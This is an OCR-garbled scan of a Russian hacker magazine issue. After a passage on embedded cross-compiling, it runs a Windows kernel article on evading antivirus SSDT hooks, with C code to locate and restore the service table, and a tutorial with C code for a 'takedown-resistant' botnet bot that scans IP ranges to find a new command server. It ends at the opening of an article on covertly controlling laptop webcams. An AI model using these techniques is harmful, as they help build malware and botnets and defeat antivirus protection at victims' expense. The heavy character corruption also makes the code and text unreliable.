линкерный скрипти применяетего. Только это незаметнодля про- 
граммиста. Здесьже, отринув все мирское, мы вынуждены составлять 
собственный Ісіз, а это особый дзен. 

Как известно, все Юниксы 
очень дружелюбны, 
просто слишком разбор- 
чивы в друзьях 

Четвертая команда также вызывает вопросы у неподготовленного 
программиста. Здесь все дело втом, что, когда запускается софт на той 
или иной ОС, то перед началом работы ядром вызывается загрузчик, 
сканирующий программу в формате ЕІ_Р (или РЕ — неважно], размещаю- 
щий ее в нужном месте памяти и передающий управление в точку старта. 
Но ведь на нашей железке пока что нет никаких ЕЕЕ-за грузчиков, а есть 
только голое процессорное ядро, тупо выполняющее машинные инструк- 
ции! Вот поэтому из получившегося ЕЕЕ-файла мы выдираем бинарный 
код, не имеющий никаких оберток. Именно втаком виде он и будет жить 
в оперативке нашего устройства, и именно он пригоден для заливки во 
флеш.Такили иначе, в неумении писатьлинкерные скрипты изагрузоч- 
ные файлы ничего страшного нет, ибоуважающий себя производитель 
микроконтроллеров обычно сам их предоставляет — это в его интересах. 

ШЬЕМ 

Понятное дело, одной только компиляции программы для начала ее 
использования недостаточно. Теперьее надо как-нибудь залить на 
целевое устройство. Хорошо, если там уже стоит нечто линуксоподоб- 
ное. Тогда для запихивания в девайс обычно достаточно нескольких 
телодвижений. Например, пересобрать^зЗ-образ файловой системы 
или же просто скопировать получившуюся софтину через ЕіНегпеІ/ 
Хтобет/ЗО-сагсІ/что-угодно. Подробности втаком случае подскажет 
Гугл или мои предыдущие статьи. 

А что, если устройство представляет собой голую железяку? Тут все 
немного сложнее. Сложность состоит в том, что тот или иной девайс 
шьется по-разному и предоставляет для этого разные интерфейсы (на- 
пример, ЛАѲ или І2С]. Здесьуже надо курить документацию на плату и 
процессор. Перечислю некоторый софт, который может понадобиться в 
этом нелегком деле. 




...Шел третий день заливки файловой системы на 
АРМ-девайс... 

ОрепоссІ ( ЬЛрѴ/орепоссІ.ЬегІіоз.сІе ) —утилита, предназначенная для 
перепрошивки АНМ и МІРЗ-устройств через интерфейс ЛА6. Поддер- 
живает пару десятков программаторов и внушительное количество 
процессорных ядер. Мизі: Ьаѵе. 

Далее, поддержку С2 или ЛАѲ-интерфейсов имени 5іІ_аЬз через 
местный программатор осуществляет Ііпих-патч по ссылке ЫТрУ/ѵѵікі. 

2 Іпіегіасе или отдельная софтина 
Ес2бгѵ [ Шр://ес2бгѵ.зоигсеІюгде.пеІ: ). 

Также существует Еер24с — программа для заливки бинарного кода в 
І2С-совместимые микросхемы постоянной памяти ЕЕРРОМ. Работает 
через спаянный на коленке ЕРТ-программатор. Программки аѵгбисіе/ 
аѵгргод/иізр/Фи-ргодгаппітіегтем или иным способом заливают про- 
шивку на популярные нынче контроллеры Аіппеі АѴР. 

Все вышеперечисленное находится в репозиториях популярных дист- 
рибутивов, поэтому установка не вызывает проблем. 

Как видно, энтузиастами написана огромная куча софта под любой 
более-менее распространенный микроконтроллер. И даже если 
производитель поставляет ѴѴі п б оѵѵз- программку для внутрисхемного 
программирования или отладки, не поленись найти свободный аналог. 
Он есть. 

ОБЛЕГЧАЕМ ЖИЗНЬ 

Не каждому дано с первого раза собрать дсс-компилятор или библио- 
теку под нужную архитектуру, даже если и имеется под рукой нужный 
мануал. Но есть готовые инструменты, сильно помогающие в этом 
нелегком деле. 

Для начала напоминаю про проект ЕтбеЬіап І етсІеЫап.огд ). имею- 
щий у себя в репозиторияхуже готовые компиляторы и библио- 
теки под множество архитектур. Также много всякого софта есть и в 
оригинальном ОеЬіап, который, какмы помним, кроссплатформеннее 
некуда. Даже ІІЬипІш (о, ужас!) уже давно портирована на некоторые 
не-х86 платформы и, следовательно, имеетскомпилированные для 
этого пакеты. 

Если же среди готовых инструментов не оказалось нужной тебе 
комбинации компилятор/библиотека, то отучасти собирать все 
вручную избавит скрипт сгоззіюоі-пд [ ЫТрѴА/ппогіп.із-а-деек.огд/ 
рго]есІ:5/сго55І:оо[ ). По словам самих разработчиков, довольно сложно 
перечислить все возможности этой программы, и я с ними согласен. 
От количества поддерживаемыхтаргетов берет оторопь, и воттутуж 
точно найдется все нужноетебе для кросс-компиляции. 

ЕХІТІ) 

Сборка софта под железо — сложное и очень интересное занятие, тре- 
бующее усидчивости. Мало что сравнится с кайфом, когда наблюдаешь 
мигающий потвоей программе светодиодик, только вот подготовка кэто- 
му может отнять очень много сил. Главное — не бросать все на пол пути, и 
иметь в виду, что линукс сильно помогаете леле етЬегИеб-колинга.. -іг 
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НОВЫЕ ПРАВИЛА ВЫЖИВАНИЯ 
ВЯДРЕѴШ0ѴѴ8 



Сегодня мы продолжим разговор о том, как помочь тебе выжить 
в суровых условиях ядра ѴѴіпсІоѵѵз, на территории, со всех сторон 
простреливаемой аверами и проактивными защитами. И не просто 
выжить, а сделать это красиво, элегантно и с наименьшими потерями. 



Разработчики малвари постоянно жалуются, что их боты мрут, как 
мухи, аверы все сильнее закручивают гайки, и выживать в системе 
становится все сложнее и сложнее. Но не стоит отчаиваться — есть 
еще порох в пороховницах и ягоды в ягодицах. В подтверждение 
этому можно привести тот факт, что на широких просторах «тырнета» 
с определенной периодичностью отлавливаются все новые и новые 
зверушки типа Ризіюск’а или ЮЗЗ, которые формально уже должны 
были быть побеждены. А если поразмыслить о том, сколько еще тай- 
ных ботов будет выявлено, то можно с уверенностью утверждать, что 
в среднесрочной перспективе разработчики аверов и проактивных 
защит без работы точно не останутся. 

ВВЕДЕНИЕ 

В сегодняшней статье речь пойдет о вполне тривиальных вещах, кото- 
рые знает любой мало-мальски опытный системный программист. Я не 
сильно согрешу против истины, если скажу, что каждый системный про- 
тер, который не понаслышке сталкивался с вопросами безопасности 
в ядре, делал подобные вещи (устанавливал хуки поверх системных 
функций для того, чтобы проконтролировать их вызов]. О борьбе хуков 
против хуков мы и поговорим сегодня. Рассмотрим ситуацию: тебе 
всеми правдами и неправдами удалось установить драйвер в систему, 
и ты уже радостно потираешь свои руки, поскольку, как тебе говорили, 
проникновение в ядро делает тебя его повелителем. И плевать ты 
хотел на то, что какой-то а вер что-то там контролирует. 

Но не тут-то было! Проникновение в ядро, будь то установка своего 
драйвера или инфектуже установленного, при наличии в системе 
очень популярной антивирусной шушеры не даст тебе ровным счетом 
ничего. Даже если ты наивно полагаешь, что исполнение твоего мега- 
кода в ядре сделает тебя его полновластным Черным Властелином. 
Такая ситуация могла быть абсолютно реальной еще несколько лет 
назад, когда кегпеі-базесі руткиты только-только стали появляться 
на публике, и аверам пришлось приспосабливаться к тому, что виру- 
сы уже начали осваивать неизведанную ранее территорию — ядро 
операционной системы. Почти каждый руткит, который можно найти 
в паблике или который так или иначе попадал в мои руки, прямо 
или косвенно использовал системные сервисы — а куда без них? И 
ведь верно, уж такова архитектура ОС марки ѴѴіпсІоѵѵз, что и виру- 
сы/руткиты, и аверы в ядре, кто для выживания, а кто — для охоты, 
используют один и тот же набор системных сервисов, куда вхо- 
дят те, которые можно найти в таблицах КеЗегѵісеОезсгірІюгТаЫе/ 



КеЗегѵісеОезсгірІогТаЫеЗНасІоѵѵ, экспорте ядра и важнейших 
драйверов. 

КЕ5ЕРѴІСЕ0Е5СКІРТ0КТАВІ.Е- 
КЛЮЧ КО ВСЕЙ СИСТЕМЕ 

Ну, или почти ко всей системе. Первое, что сделает порядочный 
антивирус и файрвол, чтобы надавать по рукам мегакулхацкерам 
— установит свои перехватчики на КеЗегѵісеОезсгірІюгТаЫе — в 
ней содержатся адреса системных сервисов, таких как, например 
ЫЮгеаІеРіІе, ІЧЮгеаІюРгосезз, ІЧЮгеаІюТНгеасІ и т.д. Для чего это 
делается, я думаю, понятно — чтобы иметь возможность отслежи- 
вать вызовы потенциально опасных для стабильности ОС системных 
сервисов (работы с виртуальной памятью, реестром, привилегиями 
и тому подобными штуками]. Как правило, такие функции перехваты- 
ваются всеми аверами подряд, поэтому можно не сомневаться — если 
на машине стоит хоть что-нибудь антивирусное, будь уверен — в 
КеЗегѵісеОезсгірІюгТаЫе найдется пара-тройка, если не десяток пере- 
хватов системных сервисов. Их количество варьируется от одного 
(Р-5есиге, например, перехватывает только ІЧЫоасЮгіѵег] до «до 
хрена и больше» (в случае с С0М000 ІЫегпеІ: ЗесигТу или Оиірозі]. 
Все это, естественно, не радует глаз начинающего системного про- 
гера. К примеру, Казрегзку АѴ вообще грузит (грузил?] свою 550Т, 
благодаря чему все системные вызовы так или иначе проходят через 
его адресное пространство. Не сильно от КеЗегѵісеОезсгірІюгТаЫе 
отличается теневая таблица КеЗегѵісеОезсгірЬгТаЫеЗЬасІоѵѵ. Ее 
второй элемент содержит таблицу ѵѵіп32к.зуз, драйвера, на котором, 
в свою очередь, держится вся графическая подсистема ѴѴіпсІоѵѵз. 
ѴѴіп32к.зуз содержит два типа сервисов: сервисы ІЧШзег* и ІЧЮсіі*, 
первые отвечают за оконную подсистему, вторые за графику. Несмотря 
на неприглядное название и недокументированность, исполь- 
зование сервисов ѴѴіп32к довольно популярно в андеграундной 
хакерской среде: посмотри на те сервисы, которые перехватывают 
аверы в КеЗегѵісеОезсгірІогТаЫеЗЬасІоѵѵ — ІЧШзегРіпсІѴѴіпсІоѵѵЕх, 
ЫШзегОиегуѴѴіпбоѵѵ, ЫШзегОеіРогедгоипсІѴѴіпсІоѵѵ — все они отвечают 
за работу с ѵѵіпбоѵѵз-окнами. 

Для начала получим указатель на КеЗегѵісеОезсгірІюгТаЫе. 

Чтобы это сделать, просто добавь в свой код такую стро- 
ку: ехіегп РѴОЮ КеЗегѵісеОезсгірЬгТаЫе. Получить адрес 
КеЗегѵісеОезсгірІогТаЬІеЗНасІоѵѵ немного сложнее, она не экспорти- 
руется, код для ее получения ты можешь найти на диске. 



► 104 
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На диске ты найдешь 
ѴѴРК — ѴѴіпсІоѵѵз 
НезеагсЬ Кегпеі, 
альтернативные сор- 
цы для сборки ядра 
ѴѴі псІоѵѵ5. Крайне 
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Перехваты в КеБегѵісеОезсгірІогТаЫе 





полезный подгон для 



Итак, что же делать? Как убрать установленные хуки? 
Самый дешевый и сердитый способ — просто вос- 
становить 550Т и выполнить свой код, а там — хоть 
трава не расти. Сделать это, несмотря на сложное 
название, довольно просто. Сначала мы через вызо- 
вы 2ѵѵ0 ре п Рі Іе/2ѵѵС геа1:е5ес1:і оп/2ѵѵМ а рѴі ехл/ОбЗесИ о п 
найдем и промаппим в свою виртуальную память 
образ ядра піозкегпі.ехе (пікгпіра.ехе для многоядерных 
систем]. Далее находим в полученной проекции ядра 
указатель на КеЗегѵісеОезсгірІогТаЫе, после чего в цикле 
восстанавливаем адреса оригинальных обработчиков. 

Находим адрес КіЗегѵісеТаЫе 

ЦЪСЖС ЕіпсІКіЗегѵісеТаЫе ( 

ІІЬСЖС ЗсіІРІг, 

ІЗШШ Напсііе) 

{ 

ШіОЫС ЬЕігзІ = 1, КѵаРІг, і; 

роіпіег = (скаг *) Напсііе ; 

роіпіег += 0x3с; 

роіпіег = (скаг *) (*(ІІЬОЫС *)роіп1ег) 

+ Напсііе + ОхАО; 

геіос = (РІМАСЕ_ВАЗЕ_КЕЬОСАТІСЖ) (сНаг *) 
(*(ІІЬОШ *)роіпСег) + Напсііе); 

иіііе ( (ЬЕігзІ) 

I I (ге1ос-> ѴігРиаІАскігезз ) ) 

{ 

ЬЕігзС = 0; 

Ііхир = ( РІМАСЕ_ЕІХІІР_ЕНТКУ ) 

{ (ШіОКО) геіос + 8); 

іог ( і = 0 ; і< (ге1ос->ЗІ2еОІВІоск - 8)»1; 
і++, 1іхир++ ) 
іі ( 1іхир->1уре == 3) 

{ 



КѵаРІг = геіос ->Ѵіг1иаІАс1с1гезз + 
1іхир->о11зе1 ; 

іі (*(РШХЖС)( Напсііе + КѵаРІг) - 
0x400000 == ЗсІІРІг ) 

{ 

11 (МРІІЗНОКТМ Напсііе + КѵаРІг - 2) 

== 0х05с7 ) 

геіигп (*(РНЬОШ)( Напсііе + КѵаРІг 
+ 4) - 0x40 0000 + Напсііе); 

} 

} 

* ( РНЪСЖС) &ге1ос += ге1ос->ЗІ2еОІВІоск; 

} 

геіигп 0 ; 

} 

} 

Минусы такого способа, я думаю, очевидны — практи- 
чески все аверы и проактивки следят за состоянием своих 
хуков, установленных в 550Т и, обнаружив их отсутствие, 
тут же их восстановят. К тому же нельзя игнорировать 
тот факт, что все порядочные аверы перехватывают 
МіСгеаіеЗесііоп и ЫіМа рѴіеѵѵОіЗесііоп, без которых при 
проецировании ядра не обойтись. Что делать в этом слу- 
чае, ты узнаешь ближе к концу статьи. 

Код, реализующий восстановление 550Т и 5Ьабоѵѵ550Т, 
ты можешь найти на диске. 

розітшвЕкш 

Как ни крути, выжить в условиях тотального контроля за 
системой очень и очень сложно. 

При вызове системного сервиса ядро нахо- 
дит указатели на КеЗегѵісеОезсгірІогТаЫе и 
Ке5егѵісе0езсгір1:огТаЫе5ЬасІоѵѵ, которые хранятся в 
структуре КТНПЕАО. Мы дружно маппим ядро, находим 



изучения внутрен- 
ностей ѴѴіпсІоѵѵз :). 




НТТР://ѴѴѴШ 

I г 

> Ііпкз 

Как всегда, ценные 
жемчужины програм- 
мистской мудрости 
можно отыскать на 
сайтах ѵѵазт.ги 
и Ыір :// Г5СІ п . ги/ 
Іогит/азт 



ХАКЕР 07 /138/ 10 



► 105 





550Т 


ЗмЛж КОТ ] ргиик* | Сгіѵег* | СО* | «К 


| Сміе НооЬ$ ] (Зеро** [ 


М 


! ЭегѵкеМшге 


[ Нмкяі . 




Ник* 


13 


Г'ЛІЙіВЛ 


у® 


ОяААС9С352 




122 


МбсГСМедеЪікЬДріі 


у« 






227 


гябйіпвДО* 


ѵ« 


зкАвддачзз 




233 


гибсИорепссм 


ѵ« 


0КЙД СТО935 




237 


молкдЗД 


ѵ« 


0 «ААОТ05С6 


Сіі№І№0 , Л315^ІжтЭ21[)ЙІѴЕй5ісііИдиаі'гІ.і 1 .'і 


292 


Г*аЯ5*г<*с№К 


ѵ« 


ОхАА09СД=А 


С':\ЩІЮа , ^15у5І:етЗгі,Мі.ІѵЕД5\сгі^диагс(.і > '5 


ЭЮ 




ѵ« 


0хАА0»Ш2 




319 




ѵад 


ОХААЕЗН21 


РД«ІМООѴѴ515ѵ^т32«ЖІѴЕй5\Сіт1диаг().іуі 


333 




уад 


ОхМЗЭТВД 




ЗЙ4 


ынлитбесСБрЬашКдеа 


ѴИ 


ЗяААМСЗЗі 




414 




у« 


ОйААО^аО 




416 




у® 


окДАЯЗРКг 




46С 


«ІІк'МездфСаІ 


V** 


0хААС№№4 




т 




У« 


0хААЯ9Й5С 




475 




ѵ« 






476 




гад 




Р:\ѵѵіі®0'^\5^і:етЭ2ѴЖГ№Я5\сіп8диаг'(І.5уі 


491 




Уад 


0КАА03РРР2 


0;1^Гн100Щ5узкет321№1УЕЯ5\с1»^оиаг(|,^ 


502 


ГЯЦнтЗепйпри* 


у® 


ОкААОЗ*=АБ6 


Р:\ѴѴЖ'0'(Ѵ5Ѵ5уіІжт32\С^ІѴЕ«5\^9иаг^.я‘і 


539 


№ІКе*ЗДСІі0ЬіМг4Ѵіеѵ««г 


у« 


ЗхДДЗЯЮЕЗ 




529 


глииіздрагегк 


ѵ« 


0&СА№Я=2СС 




519 




Ум 


ОкА ДЙ90ДДС 




552 




Ум 


Ох АДСКОЮ 


С':\^ІЮОЩ5\5у5№т32\ОЙІѵей51сііи1диаг(І.іу5 


С 


ШОсШшІСкм: 


* 







Перехваты в Ке5егѵісе0ебсгірІогТаЫе5ИасІоѵѵ 



в нем указатель на старую, неизмененную КеЭегѵісеБезсгірІюгТаЫе. 
Далее подменяем в «живой» КеЭегѵісеБезсгірІюгТаЫе указатели на 
системные сервисы своими, а в КТНПЕАВ.ЭегѵісеОезсгірІюгТаЬІе 
сохраняем указатель на найденную ранее неизмененную 
КеЗегѵісеОезсгірІогТаЫе. Вуаля! Этим незатейливым способом 
можно поставить в тупик не один продвинутый авер. Как это сделать 
в ядре? Чтобы получить указатель на структуру ЕТИПЕАБ, частью 
которой является структура КТНВЕАО (не веришь — сам посмотри], 
можно вызвать функцию РзЕоокирТЬгеасІВуТЬгеасІІсІ (как вариант — 
РзЕоокирРгосеззТЬгеасІВуСіб], в которые нужно передать хендл пото- 
ка, либо выполнить такой несложный код: 

азш ризЪ. езі; 

азш шоѵ езі, із: [0x124] . 

После этого в регистре езі будет находиться искомый указатель на 
ЕТНРЕАО. Что делать дальше, я думаю, ты поймешь. 

РОЗІТКШІІМВЕРТРИ 

Есть еще один вариант: оставить не слишком расторопный авер с 
носом (или что там у них между ног, я не помню :)). Вспомним тези- 
сы, изложенные мной в одной из прошлых статей, посвященных 
организации виртуальной памяти в ѴѴіпсІоѵѵз. В частности, там шла 
речь о подмене РТЕ для нужных виртуальных адресов, в результате 
чего появляется интересная возможность изменения данных в АП 
целевого процесса без вызова контролируемых аверами системных 
функций типа ЫіѴѴгі1:еѴігіиаІМетогу. Вспомнил? Так вот, что мешает 
нам сделать то же самое здесь? Проецируем ядро уже известными 
шагами, находим КеЭегѵісеОезсгірІюгТаЫе и адрес интересующей 
нас функции и вызываем ее, но только не через виртуальный адрес, 
а с адреса, считанного с РТЕ. Экстремалам и мазохистам можно 
предложить и такой способ: считывать нужный нам адрес напрямую 
из физической памяти. Он легко находится вот таким простым спо- 
собом: 

БШМС_РТК СеСРЪузісаІАсМгезз ( 

Ш ІІЬ(ЖС_РТК ѴігСиаІАсМгезз) 

{ 

геіигп (ѴігСиаІАсМгезз & ОхІРРРРРРР) ; 

} 



ЕЩЕ ОДНО ЯДРО? 

А почему нет? Можно пойти двумя путями. Первый — пропатчить 
ядро ѴѴіпсІоѵѵз на диске. Делается это элементарно — С геаіе Рі Іе/ 
Реа сі Рі Іе/ѴѴгііе Еі Іе . После любой модификации системных фай- 
лов необходимо пересчитать их контрольную сумму, иначе 
ѴѴіпсІоѵѵз просто откажется их загружать. Не скрою, все это слож- 
но и палевно, поскольку делать дело придется налету, в недрах 
операционной системы, где за каждым углом тебя поджидает 
злой авер. Поэтому править ядро — способ легкий, но ненадеж- 
ный. Более подробно об этом способе можно почитать в статье 
К.Касперски «Хак ядра І\ІТ»], которая все еще не потеряла своей 
актуальности. 

Экстремалам я могу предложить такой способ: собираем свое ядро 
из сорцов ѴѴВК (ѴѴіпсІоѵѵз РезеагсЬ Кегпеі], правим его при этом, 
как хотим, а затем — заменяем им ядро операционной системы 
и начинаем властвовать. Предвижу бурю недовольства и шквал 
вопросов, дескать, что это невозможно, что существует и ВЕС, и 
ядро весит несколько мегабайт... Да, не спорю, способ трудоемок, 
но вполне реализуем. И главное — может принести массу дивиден- 
дов. Каких? Если у тебя в руках будет свое полностью контролируе- 
мое ядро, то дивиденды ты будешь придумывать сам. Да и потом, 
простые эксперименты с ядром ѴѴіпсІоѵѵз в стиле «а-ля Ыпих» будут 
очень полезны для начинающего системного кодера, пусть даже 
эти эксперименты не будут направлены на обеспечение безопас- 
ности системы. Если ты из числа этих самых экстремалов — сорцы 
ѴѴПК ты сможешь найти на диске. Для начала собери их у себя на 
машине, а затем тщательно протести на виртуалке, перед тем, как 
рисковать установкой этого ядра на рабочую машину. 

РР0&(Ж 

Ну что ж, пора подводить итоги. Выжить в ядре, даже будучи в 
условиях тотального контроля со стороны бдительных аверов, 
можно. Самое главное, чего нельзя делать — это недооцени- 
вать разработчиков антивирусов, файрволов и прочих защитных 
системы — они грамотные люди и зря свой хлеб не едят. Однако 
лазейки для выживания найти всегда можно, если хорошенько 
покопаться. И не стоит, наверное, серьезно относиться к выше- 
описанному :]. Просто взгляни на смысл послания как на демон- 
страцию «ргоо[ о[ сопсері». 

Удачного компилирования, и да пребудет с тобой Сила! ц-с 
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ПРОСТОЙ СПОСОБ КОДИНГА НЕУБИВАЕМЫХ 
И АБУЗОУСТОИЧИВЫХ БОТОВ 

В одном из номеров ][ ты уже ознакомился с теорией «вечных» 
ботнетов, но, на мой взгляд, подобный подход к их реализации 
слишком сложен. Сегодня я покажу тебе новый способ обеспечить 
своему ботнету вечную жизнь не просто бесплатно, но еще и поимев 
с этого дела определенную выгоду. 

ЦЕЛЬ 

Если ты — постоянный читатель ][, то ты должен был прочитать мою 
статью про СГГзз-ВгиІе в прошлом номере. Если же нет, то объясню 
вкратце: это такой брутфорс для ВОР, с помощью которого мы с тобой 
будем зарабатывать на кусок хлеба с черной икрой :). Поехали! 

СЕМЬ РАЗ ОТМЕРЬ 

Для начала тебе придется почитать немного теории, но не бойся — ее и 
правда немного. В чем суть этого подхода? Если ты когда-либо брутил 
дедики, то знаешь, что в большинстве случаев они по одному не брутятся. 

Например, с диапазона ххх.ххх.0.0-ххх.ххх.255.255 в зависимости от 
везения можно снять 10-100 дедов. Предположим, что у нас есть некий 
ботнет. Для простоты понимания мы будем работать с «абстрактным» 
ботнетом, который фактически ничего не делает и состоит из одного- 
единственного бота и одного сервера. Так вот, сбрутил ты дедик, 
поставил на него серверную часть ботнета. В боте записан ІР сервера. 

Ну, работает наш ботнет некоторое время, а потом (внезапно!) сервер 
берет — и дохнет. Неважно, по какой причине — то ли админ тебя спа- 
лил, то ли федералы пришли все к тому же админу, то ли сервер просто 
поменяли — причины нас не интересуют. Нас интересует следствие: бот 
пытается приконнектиться к серверу, а у него ничего не получается. В 
случае с обычным ботом можно было бы сказать, что мы потеряли бот- 
нет, но у нас же есть хитрый план, который я сейчас и опишу :). 



В случае отсутствия признаков жизни на сервере, бот гене- 
рирует диапазон ІР по заданному и начинает сканить его на 
предмет стандартного порта сервера, а мы в этот момент ставим 
серверную часть на другой сервак из того же диапазона. Если 
находит — обменивается с ним некоторыми данными, чтобы 
удостовериться, что это именно его сервер, ну а если не нахо- 
дит — расширяет диапазон поиска. Для разрешения всяческих 
неприятных ситуаций типа «деды кончились, что делать?» нужно 
ввести фичу ручного указания нового диапазона. Вот, собствен- 
но, и вся теория. 

ОДИН РАЗ ОТРЕЖЬ 

Итак, приступим к делу. Писать мы будем в М5 Ѵізиаі Біисііо 2008 
на С (именно С, а не С++!), но компилятор я буду использовать 
ІпІеГовский. Почему именно так? Потому что 2010 студия на моем 
нетбуке (МБІ ѴѴіпсІ и90] тормозит, а интеловский компилятор генери- 
рует код меньшего размера и более оптимизированный, чем мел- 
комягкий, что в нашем случае очень важно. Кроме того, у I пііеі есть 
офигенный профилировщик, и мне почему-то кажется, что с «род- 
ным» бинарником он будет работать лучше, чем со скомпиленным 
Місгозо^’овским компилятором. 

Запускаем студию, создаем новый солюшн. В нем — один проект типа 
ѴѴіп32 Сопзоіе Арріісабоп (консольное легче отлаживать, потом ты 
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Типичный ІКС-ботнет 




Взаимодействие с сервером 




> сіѵсі 

Полные исходники 
смотри на диске (хотя 
большая их часть по- 
местилась в статье) 




> ѵѵагпіпд 

Не стоит восприни- 
мать эту информа- 
цию всерьез — за 
ботнеты могут сильно 
надавать по голове. 
Помни, что статья эта 
— ознакомительная, 
и ни автор, ни редак- 
ция не несут никакой 
ответственности за 
то, что ты можешь 
натворить, приняв ее 
всерьез. 



без труда сможешь переделать его в ѴѴіп32 Арріісабоп). 
Работать мы будем через простой ТСР/ІР, используя 
ѵѵіпзоск2. Процедуры для работы с сокетами показаны 
не будут (это слишком просто, если нужно — посмотри в 
исходниках на диске), поэтому приступим к рассмотрению 
функций для взаимодействия бота с сервером. 

Для начала опишем точку входа: 

Точка входа 

дебЗегѵег ( ) ; 
дебКапде ( ) ; 
ѵйіііе ( бгие ) 

{ 

зоск = бср_соппесб ( згѵ, РОКТ) ; 
іб ( воск > 0 ) { 

/* . . 8 ОМЕ МАСІС. . */ 

} еізе { // Зегѵег із сіеасі! ! ! 1 111 
гапде = дебКапде ( ) ; 

зегѵег = біпсІЗегѵег ( (скаг* ) гапде); 
іб ( зегѵег == ШЫ* ) 
сопбіпие; 

шешсру (згѵ, зегѵег, 20); 

} 

Зіеер ( 1000 ) ; 

} 

Тут мы в цикле (бесконечном, это же бот, не так ли?) 
пытаемся приконнектиться к серверу. Если у нас это 
получается — обмениваемся с ним какими-то данными, 
иначе — получаем диапазон для сканирования и ищем на 
нем сервер. 

Пламенные приветы 

гпебаі , РіеНагсІ, УаезЮ, ^^Е1у / Мігасіе, 
Елене Мещеряковой 



Функция ііпсІ5егѵег() 



сЬаг * біпсІЗегѵег ( 

сопзб С II' * бТР 

) 

{ 

Капде гапде; 
спаг * зегѵег; 

шешсру ( гапде . збагбІР , 6ІР, 3); 
шешсру ( гапде . епсІІР , 6ІР, 3); 
гапде . збагбІР [3 ] = 0; 

гапде . епсІІР [ 3 ] = 2 55; 

зегѵег = зсапКоибіпе (&гапде) ; 

іб ( зегѵег ) 

гебигп зегѵег; 

гапде . збагбІР [2 ] = 0; 

гапде . епсІІР [ 2 ] = 2 55; 

зегѵег = зсапКоибіпе (&гапде) ; 

іб ( зегѵег ) 

гебигп зегѵег; 

гапде . збагбІР [ 1 ] = 0; 

гапде . епсІІР [ 1 ] = 2 55; 

зегѵег = зсапКоибіпе ( &гапде) ; 

гебигп зегѵег; 

// Кебигпіпд роіпбег апумау (ШЬЬ боо) 



} 
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Точка входа 



Функция деІРапдеО возвращает ІР для диапазона (сначала пытается 
спросить его у сервера, а потом, если не получается, смотрит заре- 
зервированную запись в файле] и интереса не представляет, поэтому 
приведена здесь не будет. Функция деѣ5егѵег(] просто получает сер- 
вер из локального файла, в ней тоже ничего особенного нет. 

Функция бпб5егѵег() — главная функция для поиска сервера по 
заданному диапазону (см. врезку). Допустим, у нас есть ІР 192.168.1.1. 
Сначала мы сканируем 192.168.0.0-192.168.255.255. Если не удается 

— сканируем 192.0.0.0-192.255.255.255, если и тут все безнадежно — 
0.0.0.0-255.255.255.255. Если же и здесь у нас не получается найти свой 
сервер (хотя такое невозможно] — возвращаем нулевой указатель. 
Рассмотрим структуру гапде: 

ДуресІеД зДгисД 
{ 

ипзідпесі скаг зДагДІР[4], епсІІР[4]; 

} Капде ; 

В данной структуре мы храним начальный и конечный ІР диапазона 
(само собой, в ипзідпесі сЬаг]. 

Последняя функция — собственно, сканирующая. Она пытается при- 
коннектиться к серверу, но этого мало — надо еще убедиться, что 
это именно наш сервер. Для этого мы обменяемся с сервером двумя 
сообщениями — сІіНеНо и згѵНеІІо: 

сопзД скаг с1іНе11о[] = " \хБ\хЕ\хА\хБ\хВ\хЕ\хЕ\хЕ " ; 
сопзД скаг згѵНеІІо [] = " \хР\хЕ\хЕ\хВ\хВ\хА\хЕ\хБ м ; 

Сервер, получив сІіНеІІо, должен отправить згѵНеІІо. И если то, что 
он отправил клиенту, совпадет с згѵНеІІо — значит, это наш сервер 
и можно прекращать сканирование. Саму функцию сканирования ты 
можешь найти на врезке. 

Далее нам нужно научиться «просить» у сервера новый ІР для скани- 
рования. Отправляем серверу константу сІіВапде и сохраняем ответ 

— ничего СЛОЖНОГО: 

сопзД скаг с1іКапде[] = " \хА\хВ\хС\хБ" ; 

ВЫВОД 

Сегодня мы научились писать боты, которые абсолютно абузоустой- 
чивы и практически неубиваемы. Сервер «помирает» — ему на смену 
приходит новый, и все это без гиперсложных алгоритмов! Кроме 
неубиваемости мы получаем нулевые затраты на хостинг — ведь абу- 



Функция зсапРоиІіпе() 

скаг *зсапКоиДіпе ( 

сопзД Капде *гапде) 

{ 

ипзідпесі. іпД а, Ь, с, сі; 

скаг * зегѵег, сіаДа [81; 

ЗОСКЕТ зоск; 

зегѵег = (скаг*) ша11ос(20); 

сі = гапде->зДагДІР [3 ] ; 
с = гапде->зДагДІР [2 ] ; 

Ь = гапде->зДагДІР [1] ; 
а = гапде->зДагДІР [ 0 ] ; 

ѵткііе ( Дгие ) 

{ 

ІД ( сі > 255 ) 
сі = 0 , с++ ; 

іі ( с > гапде->епсіІР [2 ] && 

Ь == гапде ->епс1ІР [1] ) 

Ьгеак; 

ІД ( с > 255 ) 
с = О, Ъ++; 

іД ( Ь > гапде- >епсіІР [ 1 ] && 
а == гапде ->епс1ІР [ 0 ] ) 

ІД ( Ь > 255 ) 

Ь = 0 , а++ ; 

зргіпДД ( зегѵег , «%и . %и . %и . %и» , а, Ь, с, сі) ; 
зоск = Дср_соппесД ( зегѵег , РОКТ) ; 

ІД ( зоск > 0 ) 

{ 

// ОК, рогД із ореп, по\ѵ скеск іД! 
іі ( Дср_зепсі (зоск, СІіНеІІо, 8) < 0 ) 
сопДіпие ; 

Дср_гесѵ ( зоск, сіаДа, 8); 

іі ( тешсшр (сіаДа , згѵНеІІо, 8) ) 

сопДіпие; 

сІозезоскеД (зоск) ; 
геДигп зегѵег; 

/ / ТкаД 'з ок ! ! ! 

} 

сі++ ; 

} 

Дгее ( зегѵег) ; 
геДигп N11 В і; 

} 

зоустойчивый хостинг достаточно дорог. Кстати, у меня получился .ехе 
в 12.5 Кб размером, ведь простой Си — он и в Африке Си. Главное — 
не забывай про закон. Создавать ботнеты нельзя, а создавать русские 
(украинские и т.д.) ботнеты совсем нельзя :). Не пропускай это прави- 
ло мимо ушей, дяди в сером не дремлют. Пропустишь — будешь рвать 
волосы на том месте, о котором ты сейчас подумал. Что, согласись, не 
дело. Удачи! ц-ц 
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ССЮІЫб 




ИгорьАнтонов Нир://ѵг-опІіпе.ги 



ПОДГПЯДЬВА 

ЧЕРЕЗ 

ВЕБ-КАМЕРУ 



УЧИМСЯ ИСПОЛЬЗОВАТЬ вст 
ВЕБ-КАМЕРУ В СВОИХ ЦЕЛЯХ 



Некоторые люди опасаются, что встроенная в их ноутбуки веб- 
камера может за ними подглядывать. Они опасаются этого настолько 
серьезно, что порой даже заклеивают изолентой ее недремлющее 
око. Делают они это не зря. Мы расскажем, как можно программно 
овладеть встроенной в ноутбук веб-камерой и использовать ее 
функционал как в мирных, так и не очень целях. 



НАЧИНАЕМ РЕАЛИЗАЦИЮ: 

